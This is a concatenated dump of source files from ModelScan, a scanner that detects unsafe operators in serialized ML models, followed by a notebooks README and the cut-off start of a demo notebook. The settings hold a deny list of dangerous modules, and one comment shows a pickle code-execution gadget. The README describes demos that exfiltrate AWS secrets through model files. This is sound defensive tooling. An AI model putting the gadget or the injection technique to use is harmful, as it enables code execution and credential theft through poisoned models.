        self, settings: Optional[Dict[str, Any]] = None
    ) -> Optional[str]:
        # Returns an error name when tensorflow is missing, None otherwise.
        if not tensorflow_installed:
            return DependencyError.name()
        return None

    @staticmethod
    def name() -> str:
        return "saved_model"

    @staticmethod
    def full_name() -> str:
        return "modelscan.scanners.SavedModelScan"
class SavedModelLambdaDetectScan(SavedModelScan):
    """Looks for Keras ``Lambda`` layers inside ``keras_metadata.pb``."""

    def _scan(self, model: Model) -> Optional[ScanResults]:
        # Only the Keras metadata protobuf is relevant to this scanner; the
        # companion graph-def scanner below handles every other .pb file.
        file_name = str(model.get_source()).split("/")[-1]
        if file_name != "keras_metadata.pb":
            return None

        machine_learning_library_name = "Keras"
        operators_in_model = self._get_keras_pb_operator_names(model)
        if operators_in_model:
            # Sentinel emitted when embedded layer metadata is not valid JSON.
            if "JSONDecodeError" in operators_in_model:
                return ScanResults(
                    [],
                    [
                        JsonDecodeError(
                            self.name(),
                            "Not a valid JSON data",
                            model,
                        )
                    ],
                    [],
                )

            return SavedModelScan._check_for_unsafe_tf_keras_operator(
                machine_learning_library_name,
                operators_in_model,
                model,
                self._settings["scanners"][self.full_name()]["unsafe_keras_operators"],
            )
        # NOTE(review): falls through with an implicit None when no operators
        # were found; scan() treats that the same as "nothing to report".

    @staticmethod
    def _get_keras_pb_operator_names(model: Model) -> List[str]:
        """Return one "Lambda" marker per Lambda layer in the saved metadata.

        Returns ``["JSONDecodeError"]`` if a node's metadata is not valid
        JSON, and ``[]`` when there are no Lambda layers.
        """
        saved_metadata = SavedMetadata()
        saved_metadata.ParseFromString(model.get_stream().read())

        try:
            lambda_layers = [
                layer.get("config", {}).get("function", {}).get("items", {})
                for layer in [
                    json.loads(node.metadata)
                    for node in saved_metadata.nodes
                    if node.identifier == "_tf_keras_layer"
                ]
                if layer.get("class_name", {}) == "Lambda"
            ]
            if lambda_layers:
                return ["Lambda"] * len(lambda_layers)

        except json.JSONDecodeError as e:
            logger.error(
                f"Not a valid JSON data from source: {str(model.get_source())}, error: {e}"
            )
            # Sentinel consumed by _scan above.
            return ["JSONDecodeError"]

        return []

    @staticmethod
    def full_name() -> str:
        return "modelscan.scanners.SavedModelLambdaDetectScan"
class ScanResults:
    """Aggregate outcome of one scanner run: issues, errors and skips."""

    # Declared attribute types; populated in __init__.
    issues: List[Issue]
    errors: List[ErrorBase]
    skipped: List[ModelScanSkipped]

    def __init__(
        self,
        issues: List[Issue],
        errors: List[ErrorBase],
        skipped: List[ModelScanSkipped],
    ) -> None:
        self.issues = issues
        self.errors = errors
        self.skipped = skipped


class ScanBase(metaclass=abc.ABCMeta):
    """Common interface every scanner plugin implements."""

    def __init__(
        self,
        settings: Dict[str, Any],
    ) -> None:
        # Full settings tree; scanners index into it by their full_name().
        self._settings: Dict[str, Any] = settings

    @staticmethod
    @abc.abstractmethod
    def name() -> str:
        # Short identifier, e.g. "pickle".
        raise NotImplementedError

    @staticmethod
    @abc.abstractmethod
    def full_name() -> str:
        # Dotted path used as the settings key,
        # e.g. "modelscan.scanners.PickleUnsafeOpScan".
        raise NotImplementedError

    @abc.abstractmethod
    def scan(
        self,
        model: Model,
    ) -> Optional[ScanResults]:
        # Return ScanResults, or None when the model is not in a format
        # this scanner handles.
        raise NotImplementedError

    def handle_binary_dependencies(
        self, settings: Optional[Dict[str, Any]] = None
    ) -> Optional[str]:
        """
        Implement this method if the plugin requires a binary dependency.
        It should perform the following actions:

        1. Check if the dependency is installed
        2. Return a ModelScanError prompting the install if not
        """
        return None

    def label_results(self, results: ScanResults) -> ScanResults:
        # Stamp each issue with the scanner that produced it.
        for issue in results.issues:
            issue.details.scanner = self.full_name()
        return results
"modelscan.scanners.KerasLambdaDetectScan": { 37 | "enabled": True, 38 | "supported_extensions": [".keras"], 39 | }, 40 | "modelscan.scanners.SavedModelLambdaDetectScan": { 41 | "enabled": True, 42 | "supported_extensions": [".pb"], 43 | "unsafe_keras_operators": { 44 | "Lambda": "MEDIUM", 45 | }, 46 | }, 47 | "modelscan.scanners.SavedModelTensorflowOpScan": { 48 | "enabled": True, 49 | "supported_extensions": [".pb"], 50 | "unsafe_tf_operators": { 51 | "ReadFile": "HIGH", 52 | "WriteFile": "HIGH", 53 | }, 54 | }, 55 | "modelscan.scanners.NumpyUnsafeOpScan": { 56 | "enabled": True, 57 | "supported_extensions": [".npy"], 58 | }, 59 | "modelscan.scanners.PickleUnsafeOpScan": { 60 | "enabled": True, 61 | "supported_extensions": [ 62 | ".pkl", 63 | ".pickle", 64 | ".joblib", 65 | ".dill", 66 | ".dat", 67 | ".data", 68 | ], 69 | }, 70 | "modelscan.scanners.PyTorchUnsafeOpScan": { 71 | "enabled": True, 72 | "supported_extensions": [".bin", ".pt", ".pth", ".ckpt"], 73 | }, 74 | }, 75 | "middlewares": { 76 | "modelscan.middlewares.FormatViaExtensionMiddleware": { 77 | "formats": { 78 | SupportedModelFormats.TENSORFLOW: [".pb"], 79 | SupportedModelFormats.KERAS_H5: [".h5"], 80 | SupportedModelFormats.KERAS: [".keras"], 81 | SupportedModelFormats.NUMPY: [".npy"], 82 | SupportedModelFormats.PYTORCH: [".bin", ".pt", ".pth", ".ckpt"], 83 | SupportedModelFormats.PICKLE: [ 84 | ".pkl", 85 | ".pickle", 86 | ".joblib", 87 | ".dill", 88 | ".dat", 89 | ".data", 90 | ], 91 | } 92 | } 93 | }, 94 | "unsafe_globals": { 95 | "CRITICAL": { 96 | "__builtin__": [ 97 | "eval", 98 | "compile", 99 | "getattr", 100 | "apply", 101 | "exec", 102 | "open", 103 | "breakpoint", 104 | "__import__", 105 | ], # Pickle versions 0, 1, 2 have those function under '__builtin__' 106 | "builtins": [ 107 | "eval", 108 | "compile", 109 | "getattr", 110 | "apply", 111 | "exec", 112 | "open", 113 | "breakpoint", 114 | "__import__", 115 | ], # Pickle versions 3, 4 have those function under 'builtins' 116 | 
"runpy": "*", 117 | "os": "*", 118 | "nt": "*", # Alias for 'os' on Windows. Includes os.system() 119 | "posix": "*", # Alias for 'os' on Linux. Includes os.system() 120 | "socket": "*", 121 | "subprocess": "*", 122 | "sys": "*", 123 | "operator": [ 124 | "attrgetter", # Ex of code execution: operator.attrgetter("system")(__import__("os"))("echo pwned") 125 | ], 126 | "pty": "*", 127 | "pickle": "*", 128 | "_pickle": "*", 129 | "bdb": "*", 130 | "pdb": "*", 131 | "shutil": "*", 132 | "asyncio": "*", 133 | }, 134 | "HIGH": { 135 | "webbrowser": "*", # Includes webbrowser.open() 136 | "httplib": "*", # Includes http.client.HTTPSConnection() 137 | "requests.api": "*", 138 | "aiohttp.client": "*", 139 | }, 140 | "MEDIUM": {}, 141 | "LOW": {}, 142 | }, 143 | "reporting": { 144 | "module": "modelscan.reports.ConsoleReport", 145 | "settings": {}, 146 | }, # JSON reporting can be configured by changing "module" to "modelscan.reports.JSONReport" and adding an optional "output_file" field. For custom reporting modules, change "module" to the module name and add the applicable settings fields 147 | } 148 | 149 | 150 | class SettingsUtils: 151 | @staticmethod 152 | def get_default_settings_as_toml() -> Any: 153 | toml_settings = tomlkit.dumps(DEFAULT_SETTINGS) 154 | 155 | # Add settings file header 156 | toml_settings = f"# ModelScan settings file\n\n{toml_settings}" 157 | 158 | return toml_settings 159 | -------------------------------------------------------------------------------- /modelscan/skip.py: -------------------------------------------------------------------------------- 1 | import logging 2 | 3 | from modelscan.settings import Property 4 | 5 | logger = logging.getLogger("modelscan") 6 | 7 | 8 | class SkipCategories: 9 | SCAN_NOT_SUPPORTED = Property("SCAN_NOT_SUPPORTED", 1) 10 | BAD_ZIP = Property("BAD_ZIP", 2) 11 | MODEL_CONFIG = Property("MODEL_CONFIG", 3) 12 | H5_DATA = Property("H5_DATA", 4) 13 | NOT_IMPLEMENTED = Property("NOT_IMPLEMENTED", 5) 14 | 
class Skip:
    """Record describing a skipped scan target (declaration only).

    NOTE(review): this class is never fully implemented here —
    ModelScanSkipped below is the concrete skip record.
    """

    # Declared attribute types for a skip record.
    scan_name: str
    category: SkipCategories
    message: str
    source: str

    def __init__(self) -> None:
        pass

    def __str__(self) -> str:
        raise NotImplementedError()


class ModelScanSkipped:
    """Why a particular file was not scanned by a given scanner."""

    def __init__(
        self,
        scan_name: str,
        category: Property,
        message: str,
        source: str,
    ) -> None:
        self.scan_name = scan_name
        self.category = category
        self.message = message
        # Normalize to str in case a Path-like object is handed in.
        self.source = str(source)

    def __str__(self) -> str:
        return (
            f"The following file {self.source} was skipped during a "
            f"{self.scan_name} scan: \n{self.message}"
        )
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | 23 | ========= 24 | BSD 3-Clause 25 | 26 | Copyright (c) 2015-2023, Heungsub Lee 27 | All rights reserved. 28 | 29 | Redistribution and use in source and binary forms, with or without modification, 30 | are permitted provided that the following conditions are met: 31 | 32 | Redistributions of source code must retain the above copyright notice, this 33 | list of conditions and the following disclaimer. 34 | 35 | Redistributions in binary form must reproduce the above copyright notice, this 36 | list of conditions and the following disclaimer in the documentation and/or 37 | other materials provided with the distribution. 38 | 39 | Neither the name of the copyright holder nor the names of its 40 | contributors may be used to endorse or promote products derived from 41 | this software without specific prior written permission. 42 | 43 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 44 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 45 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 46 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 47 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 48 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 49 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 50 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 51 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 52 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
class DefaultGroup(click.Group):
    """Invokes a subcommand marked with `default=True` if any subcommand not
    chosen.

    :param default_if_no_args: resolves to the default command if no arguments
    passed.

    """

    def __init__(self, *args: object, **kwargs) -> None:  # type: ignore
        # To resolve as the default command.
        # Unknown options must be tolerated so they can be forwarded to the
        # default command; explicitly disabling that is rejected.
        if not kwargs.get("ignore_unknown_options", True):
            raise ValueError("Default group accepts unknown options")
        self.ignore_unknown_options = True
        # Name of the command to fall back to when none is given explicitly.
        self.default_cmd_name = kwargs.pop("default", None)
        self.default_if_no_args = kwargs.pop("default_if_no_args", False)
        super(DefaultGroup, self).__init__(*args, **kwargs)  # type: ignore

    def set_default_command(self, command: Command) -> None:
        """Sets a command function as the default command."""
        cmd_name = command.name
        self.add_command(command)
        self.default_cmd_name = cmd_name

    def parse_args(self, ctx: Context, args: Any) -> List[str]:
        # With default_if_no_args, an empty invocation runs the default command.
        if not args and self.default_if_no_args:
            args.insert(0, self.default_cmd_name)
        return super(DefaultGroup, self).parse_args(ctx, args)

    def get_command(self, ctx: Context, cmd_name: str) -> Optional[Command]:
        if cmd_name not in self.commands:
            # No command name matched.
            # Remember the unmatched token so resolve_command can re-insert
            # it as the first argument of the default command.
            ctx.arg0 = cmd_name  # type: ignore
            cmd_name = self.default_cmd_name
        return super(DefaultGroup, self).get_command(ctx, cmd_name)

    def resolve_command(
        self, ctx: Context, args: Any
    ) -> Tuple[Optional[str], Optional[Command], List[str]]:
        base = super(DefaultGroup, self)
        cmd_name, cmd, args = base.resolve_command(ctx, args)  # type: ignore
        if hasattr(ctx, "arg0"):
            # The original first token was not a command name; hand it back
            # to the resolved (default) command as its first argument.
            args.insert(0, ctx.arg0)
            cmd_name = cmd.name
        return cmd_name, cmd, args

    def format_commands(self, ctx: Context, formatter: HelpFormatter) -> None:
        # Wrap the formatter so the default command is marked in help output.
        formatter = DefaultCommandFormatter(self, formatter, mark="*")
        return super(DefaultGroup, self).format_commands(ctx, formatter)

    def command(self, *args: Any, **kwargs: Any) -> Union[Any, Command]:
        """Group.command decorator that also accepts ``default=True``."""
        default = kwargs.pop("default", False)
        decorator = super(DefaultGroup, self).command(*args, **kwargs)
        if not default:
            return decorator

        def _decorator(f: Command) -> Union[Any, Command]:
            # Register the command and record it as the group's default.
            cmd = decorator(f)
            self.set_default_command(cmd)
            return cmd

        return _decorator


class DefaultCommandFormatter(HelpFormatter):
    """Wraps a formatter to mark a default command."""

    def __init__(self, group: DefaultGroup, formatter: HelpFormatter, mark: str = "*"):
        self.group = group
        self.formatter = formatter
        self.mark = mark

    def __getattr__(self, attr):  # type: ignore
        # Delegate everything not overridden here to the wrapped formatter.
        return getattr(self.formatter, attr)

    def write_dl(self, rows, *args, **kwargs):  # type: ignore
        # Move the default command to the top of the listing and append the mark.
        rows_ = []  # type: ignore
        for cmd_name, help in rows:
            if cmd_name == self.group.default_cmd_name:
                rows_.insert(0, (cmd_name + self.mark, help))
            else:
                rows_.append((cmd_name, help))
        return self.formatter.write_dl(rows_, *args, **kwargs)
logger = logging.getLogger("modelscan")


class GenOpsError(Exception):
    """Raised when ``pickletools.genops`` fails partway through a stream.

    Attributes:
        msg: Human-readable description of the parse failure.
        globals: Any ``(module, name)`` imports already discovered before the
            failure, or ``None`` if nothing had been found yet. Callers use
            this to still report on partially scanned streams.
    """

    def __init__(self, msg: str, globals: Optional[Set[Tuple[str, str]]]):
        self.msg = msg
        self.globals = globals
        super().__init__()

    def __str__(self) -> str:
        return self.msg


# TODO: handle methods loading other Pickle files (either mark as suspicious,
# or follow calls to scan other files [preventing infinite loops]):
# pickle.load()/loads(), numpy.load(), numpy.ctypeslib.load_library(),
# pandas.read_pickle(), joblib.load(), torch.load(),
# tf.keras.models.load_model()


def _list_globals(
    data: IO[bytes], multiple_pickles: bool = True
) -> Set[Tuple[str, str]]:
    """Disassemble one or more pickle streams and collect imported globals.

    Args:
        data: Binary stream positioned at the start of a pickle payload.
        multiple_pickles: When True, keep parsing until the stream is
            exhausted (a file may contain several concatenated pickles).

    Returns:
        The set of ``(module, name)`` pairs referenced by GLOBAL, INST and
        STACK_GLOBAL opcodes.

    Raises:
        GenOpsError: If opcode disassembly fails; carries any globals that
            were found before the failure.
    """
    # NOTE: renamed from ``globals`` to avoid shadowing the builtin.
    found_globals: Set[Any] = set()

    # Maps memo keys to the string memoized just before each PUT/MEMOIZE, so
    # STACK_GLOBAL operands fetched via GET can be resolved to their strings.
    memo: Dict[Union[int, str], str] = {}
    # Scan the data for pickle buffers, stopping when parsing fails or stops
    # making progress.
    last_byte = b"dummy"
    while last_byte != b"":
        # List opcodes
        try:
            ops: List[Tuple[Any, Any, Union[int, None]]] = list(
                pickletools.genops(data)
            )
        except Exception as e:
            # Given we can have multiple pickles in a file, we may have
            # already successfully extracted globals from a valid pickle.
            # Thus return the already found globals in the error & let the
            # caller decide what to do.
            globals_opt = found_globals if len(found_globals) > 0 else None
            raise GenOpsError(str(e), globals_opt) from e

        last_byte = data.read(1)
        data.seek(-1, 1)

        # Extract global imports
        for n in range(len(ops)):
            op = ops[n]
            op_name = op[0].name
            op_value: str = op[1]

            if op_name == "MEMOIZE" and n > 0:
                # MEMOIZE implicitly uses the next free memo slot.
                memo[len(memo)] = ops[n - 1][1]
            elif op_name in ["PUT", "BINPUT", "LONG_BINPUT"] and n > 0:
                memo[op_value] = ops[n - 1][1]
            elif op_name in ("GLOBAL", "INST"):
                # Argument is "module name" joined by a space.
                found_globals.add(tuple(op_value.split(" ", 1)))
            elif op_name == "STACK_GLOBAL":
                # Walk backwards to recover the two strings (name, module)
                # that were pushed (directly or via the memo) for this opcode.
                values: List[str] = []
                for offset in range(1, n):
                    if ops[n - offset][0].name in [
                        "MEMOIZE",
                        "PUT",
                        "BINPUT",
                        "LONG_BINPUT",
                    ]:
                        continue
                    if ops[n - offset][0].name in ["GET", "BINGET", "LONG_BINGET"]:
                        values.append(memo[int(ops[n - offset][1])])
                    elif ops[n - offset][0].name not in [
                        "SHORT_BINUNICODE",
                        "UNICODE",
                        "BINUNICODE",
                        "BINUNICODE8",
                    ]:
                        logger.debug(
                            "Presence of non-string opcode, categorizing as an unknown dangerous import"
                        )
                        values.append("unknown")
                    else:
                        values.append(ops[n - offset][1])
                    if len(values) == 2:
                        break
                if len(values) != 2:
                    raise ValueError(
                        f"Found {len(values)} values for STACK_GLOBAL at position {n} instead of 2."
                    )
                # values are collected in reverse push order: [name, module].
                found_globals.add((values[1], values[0]))
        if not multiple_pickles:
            break

    return found_globals


def scan_pickle_bytes(
    model: Model,
    settings: Dict[str, Any],
    scan_name: str = "pickle",
    multiple_pickles: bool = True,
    offset: int = 0,
) -> ScanResults:
    """Disassemble a Pickle stream and report issues.

    Args:
        model: Model wrapper providing the stream to scan and its source.
        settings: Scanner settings; ``settings["unsafe_globals"]`` maps
            severity names to ``{module: "*" | [name, ...]}`` filters.
        scan_name: Name reported on errors (e.g. "pickle", "numpy", "pytorch").
        multiple_pickles: Whether the stream may contain several pickles.
        offset: Byte offset at which the pickle payload starts.
    """
    issues: List[Issue] = []
    try:
        raw_globals = _list_globals(model.get_stream(offset), multiple_pickles)
    except GenOpsError as e:
        # Parsing failed midway; still report on whatever was recovered.
        if e.globals is not None:
            return _build_scan_result_from_raw_globals(
                e.globals,
                model,
                settings,
            )
        return ScanResults(
            issues,
            [
                PickleGenopsError(
                    scan_name,
                    f"Parsing error: {e}",
                    model,
                )
            ],
            [],
        )
    # BUG FIX: the previous call passed a stray ``settings`` argument with no
    # matching %s placeholder, which made the logging module raise (and then
    # swallow) a formatting error whenever debug logging was enabled.
    logger.debug("Global imports in %s: %s", model, raw_globals)
    return _build_scan_result_from_raw_globals(raw_globals, model, settings)


def _build_scan_result_from_raw_globals(
    raw_globals: Set[Tuple[str, str]],
    model: Model,
    settings: Dict[str, Any],
) -> ScanResults:
    """Match ``(module, name)`` imports against the configured unsafe globals
    and convert hits into ``Issue`` objects at the matching severity."""
    issues: List[Issue] = []
    severities = {
        "CRITICAL": IssueSeverity.CRITICAL,
        "HIGH": IssueSeverity.HIGH,
        "MEDIUM": IssueSeverity.MEDIUM,
        "LOW": IssueSeverity.LOW,
    }

    for rg in raw_globals:
        global_module, global_name, severity = rg[0], rg[1], None
        for severity_name in severities:
            if global_module not in settings["unsafe_globals"][severity_name]:
                continue
            # The filter is either "*" (any name in the module is unsafe) or
            # a list of substrings to look for in the imported name.
            # NOTE: renamed from ``filter`` to avoid shadowing the builtin.
            name_filters = settings["unsafe_globals"][severity_name][global_module]
            if name_filters == "*":
                severity = severities[severity_name]
                break
            for filter_value in name_filters:
                if filter_value in global_name:
                    severity = severities[severity_name]
                    break
            else:
                # No name matched at this severity; try the next one.
                continue
            break

        if "unknown" in global_module or "unknown" in global_name:
            severity = IssueSeverity.CRITICAL  # we must assume it is RCE
        if severity is not None:
            issues.append(
                Issue(
                    code=IssueCode.UNSAFE_OPERATOR,
                    severity=severity,
                    details=OperatorIssueDetails(
                        module=global_module,
                        operator=global_name,
                        source=model.get_source(),
                        severity=severity,
                    ),
                )
            )
    return ScanResults(issues, [], [])


def scan_numpy(model: Model, settings: Dict[str, Any]) -> ScanResults:
    """Scan a NumPy file: skip .npz, scan object-dtype .npy payloads, and
    fall back to a plain pickle scan for anything else."""
    scan_name = "numpy"
    # Code to distinguish from NumPy binary files and pickles.
    _ZIP_PREFIX = b"PK\x03\x04"
    _ZIP_SUFFIX = b"PK\x05\x06"  # empty zip files start with this
    N = len(np.lib.format.MAGIC_PREFIX)
    stream = model.get_stream()
    magic = stream.read(N)
    # If the file size is less than N, we need to make sure not
    # to seek past the beginning of the file
    stream.seek(-min(N, len(magic)), 1)  # back-up
    if magic.startswith(_ZIP_PREFIX) or magic.startswith(_ZIP_SUFFIX):
        # .npz file
        return ScanResults(
            [],
            [],
            [
                ModelScanSkipped(
                    scan_name,
                    SkipCategories.NOT_IMPLEMENTED,
                    "Scanning of .npz files is not implemented yet",
                    str(model.get_source()),
                )
            ],
        )

    elif magic == np.lib.format.MAGIC_PREFIX:
        # .npy file
        version = np.lib.format.read_magic(stream)  # type: ignore[no-untyped-call]
        np.lib.format._check_version(version)  # type: ignore[attr-defined]
        _, _, dtype = np.lib.format._read_array_header(stream, version)  # type: ignore[attr-defined]

        # Only object arrays embed pickled data worth scanning.
        if dtype.hasobject:
            return scan_pickle_bytes(model, settings, scan_name, True, stream.tell())
        else:
            return ScanResults([], [], [])
    else:
        return scan_pickle_bytes(model, settings, scan_name)


def scan_pytorch(model: Model, settings: Dict[str, Any]) -> ScanResults:
    """Scan a legacy (non-zip) PyTorch file: verify the serialization magic
    number, then scan the embedded pickle."""
    scan_name = "pytorch"
    should_read_directly = _should_read_directly(model.get_stream())
    if should_read_directly and model.get_stream().tell() == 0:
        # try loading from tar
        try:
            # TODO: implement loading from tar
            raise TarError()
        except TarError:
            # file does not contain a tar
            model.get_stream().seek(0)

    magic = get_magic_number(model.get_stream())
    if magic != MAGIC_NUMBER:
        return ScanResults(
            [],
            [],
            [
                ModelScanSkipped(
                    scan_name,
                    SkipCategories.MAGIC_NUMBER,
                    "Invalid magic number",
                    str(model.get_source()),
                )
            ],
        )

    return scan_pickle_bytes(model, settings, scan_name, multiple_pickles=False)
# copied from pytorch code
# https://github.com/pytorch/pytorch/blob/664058fa83f1d8eede5d66418abff6e20bd76ca8/torch/serialization.py#L280
def _should_read_directly(f: IO[bytes]) -> bool:
    """
    Checks if f is a file that should be read directly. It should be read
    directly if it is backed by a real file (has a fileno) and is not a
    a compressed file (e.g. gzip)
    """
    if _is_compressed_file(f):
        return False
    try:
        return f.fileno() >= 0
    except io.UnsupportedOperation:
        # In-memory streams (e.g. BytesIO) have no file descriptor.
        return False
    except AttributeError:
        return False


# copied from pytorch code
# https://github.com/pytorch/pytorch/blob/0b3316ad2c6ff61416597ef29e8865876dcb12f5/torch/serialization.py#L66
def _is_zipfile(source: Union[Path, str], data: Optional[IO[bytes]] = None) -> bool:
    """Return True if the stream/file starts with a zip local-file header.

    This is a stricter implementation than zipfile.is_zipfile(), which is
    True if the magic number appears anywhere in the binary. Since we expect
    the files here to be generated by torch.save or torch.jit.save, it's safe
    to only check the start bytes (see bugs.python.org/issue28494).

    Args:
        source: Path to open when ``data`` is not supplied.
        data: Optional already-open binary stream; its position is restored
            before returning.
    """
    if data is None:
        opened_here = True
        stream: IO[bytes] = open(source, "rb")
    else:
        opened_here = False
        stream = data

    # BUG FIX: perform the read under try/finally so the handle opened above
    # cannot leak if tell/read/seek raises.
    try:
        start = stream.tell()
        # Read the first 4 bytes of the file (may be fewer near EOF, in which
        # case the comparison below simply fails).
        header = stream.read(4)
        stream.seek(start)
    finally:
        if opened_here:
            stream.close()

    return header == b"PK\x03\x04"


def get_magic_number(data: IO[bytes]) -> Optional[int]:
    """Return the first INT/LONG opcode value pickled in ``data``.

    PyTorch's legacy serialization format starts with a pickled magic number;
    on success the stream is rewound to position 0. Returns None when the
    stream holds no integer opcode or is not parseable as a pickle.
    """
    try:
        for opcode, args, _pos in genops(data):
            if "INT" in opcode.name or "LONG" in opcode.name:
                data.seek(0)
                return int(args)  # type: ignore[arg-type]
    except ValueError:
        # Not a valid pickle stream.
        return None
    return None

10 | # PyTorch 11 | PyTorch models can be saved and loaded using pickle. modelscan can scan models saved using pickle. A notebook to illustrate the following is added. 12 | 13 | - Exfiltrate AWS secret on a PyTorch model using `os.system()` 14 | - modelscan usage and expected scan results with safe and unsafe PyTorch models 15 | 16 | 📓 Notebook: [pytorch_sentiment_analysis.ipynb](pytorch_sentiment_analysis.ipynb) 17 | 18 | 🔗 Model: [cardiffnlp/twitter-roberta-base-sentiment](https://huggingface.co/cardiffnlp/twitter-roberta-base-sentiment) 19 | 20 |

21 | # Tensorflow 22 | Tensorflow uses saved_model for model serialization. modelscan can scan models saved using saved_model. A notebook to illustrate the following is added. 23 | 24 | - Exfiltrate AWS secret on a Tensorflow model using `tf.io.read_file()` and `tf.io.write_file()` 25 | - ModelScan usage and expected scan results with safe and unsafe Tensorflow models 26 | 27 | 📓 Notebook: [tensorflow_fashion_mnist.ipynb](./tensorflow_fashion_mnist.ipynb) 28 | 29 | 🔗 Model: Classification of fashion mnist dataset. [Reference to Tensorflow tutorial](https://www.tensorflow.org/tutorials/keras/classification). 30 | 31 |

32 | # Keras 33 | Keras uses saved_model and h5 for model serialization. A notebook to illustrate the following is added. 34 | 35 | - Exfiltrate AWS secret on a Keras model using `keras.layers.lambda()` 36 | - ModelScan usage and expected scan results with safe and unsafe Keras models 37 | 38 | 📓 Notebook: [keras_fashion_mnist.ipynb](./keras_fashion_mnist.ipynb). 39 | 40 | 🔗 Model: Classification of fashion mnist dataset. [Reference to Tensorflow tutorial](https://www.tensorflow.org/tutorials/keras/classification). 41 | 42 |

43 | # Classical ML libraries 44 | 45 | modelscan also supports all ML libraries that support pickle for their model serialization, such as Sklearn, XGBoost, Catboost etc. A notebook to illustrate the following is added. 46 | 47 | - Exfiltrate AWS secret on a XGBoost model using `os.system()` 48 | - ModelScan usage and expected scan results with safe and unsafe XGBoost models 49 | 50 | 📓 Notebook: [xgboost_diabetes_classification.ipynb](./xgboost_diabetes_classification.ipynb) 51 | 52 | 🔗 Model: Classification of diabetes. [Link to PIMA Indian diabetes dataset](https://www.kaggle.com/datasets/uciml/pima-indians-diabetes-database) 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /notebooks/pytorch_sentiment_analysis.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "metadata": {}, 6 | "source": [ 7 | "# Setup " 8 | ] 9 | }, 10 | { 11 | "cell_type": "markdown", 12 | "metadata": {}, 13 | "source": [ 14 | "## Installing ModelScan" 15 | ] 16 | }, 17 | { 18 | "cell_type": "code", 19 | "execution_count": 1, 20 | "metadata": {}, 21 | "outputs": [ 22 | { 23 | "name": "stdout", 24 | "output_type": "stream", 25 | "text": [ 26 | "Note: you may need to restart the kernel to use updated packages.\n", 27 | "modelscan, version 0.0.0\n" 28 | ] 29 | } 30 | ], 31 | "source": [ 32 | "%pip install -q modelscan\n", 33 | "!modelscan -v" 34 | ] 35 | }, 36 | { 37 | "cell_type": "code", 38 | "execution_count": 2, 39 | "metadata": {}, 40 | "outputs": [ 41 | { 42 | "name": "stdout", 43 | "output_type": "stream", 44 | "text": [ 45 | ] 46 | } 47 | ], 48 | "source": [ 49 | "%pip install -q torch==2.0.1\n", 50 | "%pip install -q transformers==4.31.0\n", 51 | "%pip install -q scipy==1.11.1" 52 | ] 53 | }, 54 | { 55 | "cell_type": "code", 56 | "execution_count": 4, 57 | "metadata": {}, 58 | "outputs": [ 59 | { 60 | "name": "stdout", 61 | 
"output_type": "stream", 62 | "text": [ 63 | "env: TOKENIZERS_PARALLELISM=false\n" 64 | ] 65 | } 66 | ], 67 | "source": [ 68 | "import torch\n", 69 | "import os\n", 70 | "from utils.pytorch_sentiment_model import download_model, predict_sentiment\n", 71 | "from utils.pickle_codeinjection import PickleInject, get_payload\n", 72 | "\n", 73 | "%env TOKENIZERS_PARALLELISM=false" 74 | ] 75 | }, 76 | { 77 | "cell_type": "markdown", 78 | "metadata": {}, 79 | "source": [ 80 | "# Saving Model\n", 81 | "\n", 82 | "\n", 83 | "The BERT based sentiment analysis PyTorch model used in the notebook can be found at https://huggingface.co/cardiffnlp/twitter-roberta-base-sentiment. The safe model is saved at `./PyTorchModels/safe_model.pt`" 84 | ] 85 | }, 86 | { 87 | "cell_type": "code", 88 | "execution_count": 5, 89 | "metadata": {}, 90 | "outputs": [], 91 | "source": [ 92 | "# Save a model for sentiment analysis\n", 93 | "from typing import Final\n", 94 | "\n", 95 | "model_directory: Final[str] = \"PyTorchModels\"\n", 96 | "if not os.path.isdir(model_directory):\n", 97 | " os.mkdir(model_directory)\n", 98 | "\n", 99 | "safe_model_path = os.path.join(model_directory, \"safe_model.pt\")\n", 100 | "\n", 101 | "download_model(safe_model_path)" 102 | ] 103 | }, 104 | { 105 | "cell_type": "markdown", 106 | "metadata": {}, 107 | "source": [ 108 | "# Safe Model Prediction" 109 | ] 110 | }, 111 | { 112 | "cell_type": "code", 113 | "execution_count": 6, 114 | "metadata": {}, 115 | "outputs": [ 116 | { 117 | "name": "stdout", 118 | "output_type": "stream", 119 | "text": [ 120 | "The overall sentiment is: negative with a score of: 85.9%\n" 121 | ] 122 | } 123 | ], 124 | "source": [ 125 | "sentiment = predict_sentiment(\n", 126 | " \"Stock market was bearish today\", torch.load(safe_model_path)\n", 127 | ")" 128 | ] 129 | }, 130 | { 131 | "cell_type": "markdown", 132 | "metadata": {}, 133 | "source": [ 134 | "# Scan Safe Model\n", 135 | "\n", 136 | "The scan results include information on the 
